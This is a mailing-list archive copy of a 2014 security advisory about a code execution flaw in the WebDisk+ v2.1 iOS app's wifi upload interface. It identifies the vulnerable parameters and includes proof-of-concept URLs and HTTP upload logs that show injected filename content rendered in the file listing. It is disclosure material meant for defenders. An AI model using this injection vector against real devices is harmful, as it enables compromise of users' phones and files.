[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] WebDisk+ v2.1 iOS - Code Execution Vulnerability
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2014-10-27 15:09:59
Message-ID: 544E6047.8040009 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
WebDisk+ v2.1 iOS - Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1349
Release Date:
=============
2014-10-23
Vulnerability Laboratory ID (VL-ID):
====================================
1349
Common Vulnerability Scoring System:
====================================
9.1
Product & Service Introduction:
===============================
WebDisk+ is a Push verion of WebDisk. It have all Full functionality of WebDisk .lets your \
iphone/ipad become a file website over wi-fi netwrk.You can upload/download your document to \
your iphone/ipad on your pc browser over wi-fi. And it is also a document viewer.let you \
direct view your document on your iphone/iphone. WebDisk+ can support Upload and download large \
files (More than 4GB) form pc or other mobile device.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/webdisk+/id606709149 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered a code execution vulnerability in the \
official AirPhoto WebDisk+ v2.1 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-10-23: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
AirPhoto
Product: WebDisk+ - iOS Mobile Web Application (Wifi) 2.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
A code execution web vulnerability has been discovered in the official AirPhoto WebDisk+ v2.1 \
iOS mobile web-application. The vulnerability allows remote attackers to compromise the \
application and connected device components by exploitation of a system specific code \
execution vulnerability in the wifi interface.
The vulnerability is located in the `name` input field of the wifi web interface upload module \
(afupload.ma). The function creates the files without any protection or filter mechanism in \
the GET method request. Remote attackers are able to manipulate the GET method request by \
usage of the `p & filename` parameters in the `afupload.ma` file to compromise the application \
or device. The execution of the code occurs in the `afgetdir.ma` file of the wifi interface. \
The attack vector is located on the application-side of the mobile app and the request method \
to inject/execute is GET.
The security risk of the code execution vulnerability is estimated as critical with a cvss \
(common vulnerability scoring system) count of 9.1. Exploitation of the code execution \
vulnerability requires no privileged application user account or user interaction. Successful \
exploitation of the code execution vulnerability results in mobile application compromise and \
affected or connected device component compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Upload
Vulnerable File(s):
[+] afupload.ma
Vulnerable Parameter(s):
[+] p & filename
Affected Module(s):
[+] Wifi Interface (http://localhost:1861)
Proof of Concept (PoC):
=======================
The code execution web vulnerability can be exploited by remote attackers without privileged \
application user account or user interaction. For security demonstration or to reproduce the \
security vulnerability follow the provided information and steps below to continue.
PoC: (URL)
http://localhost:1861/afgetdir.ma?p=\var\mobile\Containers\Data\Application\90ACE99A-5EF3-4E3E-B509-32CCDF066AA1\Documents\
PoC: localhost:1861 - Web Interface Index
<tr><td class="tdleft"><a href=""><img class="imgthum" src="afico/files_txt.png"></a></td>
<td class="tdmid">-[CODE EXECUTION VULNERABILITY VIA GET];</td>
<td class="tdright">10-22 13:28<br/><br/>
<a href="afdelete.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C%7C-%7C467299731.txt">delete</a></td>
</tr><tr><td colspan="3" height="1"><hr class="spline" /></td>
</tr><tr></tr></table></body></html>
</iframe></td></tr>
Note:
The input field to create/upload files allows a remote attacker to execute codes directly in \
the web-server with multiple attack vectors.
--- PoC Session Logs (POST) ---
Status: 302[OK]
POST http://192.168.2.104:1861/afupload.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C \
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime \
Type[application/x-unknown-content-type] Request Header:
Host[192.168.2.104:1861]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------531465230341
Content-Disposition: form-data; name="txt"
-[CODE EXECUTION VULNERABILITY VIA GET];
-----------------------------531465230341
Content-Disposition: form-data; name="file"; filename="[PENG!]"
Content-Type: application/octet-stream
-----------------------------531465230341
Content-Disposition: form-data; name="sub"
upload
-----------------------------531465230341--]
Response Header:
Location[afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C]
Content-Length[0]
Server[MHttpServer/1.0.0] Status: 200[OK]
GET http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C \
Load Flags[LOAD_DOCUMENT_URI LOAD_REPLACE LOAD_INITIAL_DOCUMENT_URI ] Größe des \
Inhalts[3051] Mime Type[text/html] Request Header:
Host[192.168.2.104:1861]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:1861/afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C]
Connection[keep-alive]
Response Header:
Content-Type[text/html]
Content-Length[3051]
Server[MHttpServer/1.0.0]
Reference(s):
afgetdir.ma
afgetdir.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C
afupload.ma
afupload.ma?p=%5Cvar%5Cmobile%5CContainers%5CData%5CApplication%5C90ACE99A-5EF3-4E3E-B509-32CCDF066AA1%5CDocuments%5C
Solution - Fix & Patch:
=======================
To patch the vulnerability it is required to parse and encode the upload GET method request.
Restrict the input field of the p & filename value to prevent code execution in the main wifi \
interface.
Security Risk:
==============
The security risk of the code execution web vulnerability in the path value is estimated as \
critical. (CVSS 9.1)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) \
[www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - \
admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - \
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - \
vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) \
to get a permission.
Copyright © 2014 | Vulnerability Laboratory - Evolution Security GmbH â„¢
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
COMPANY: Evolution Security GmbH
BUSINESS: www.evolution-sec.com
_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic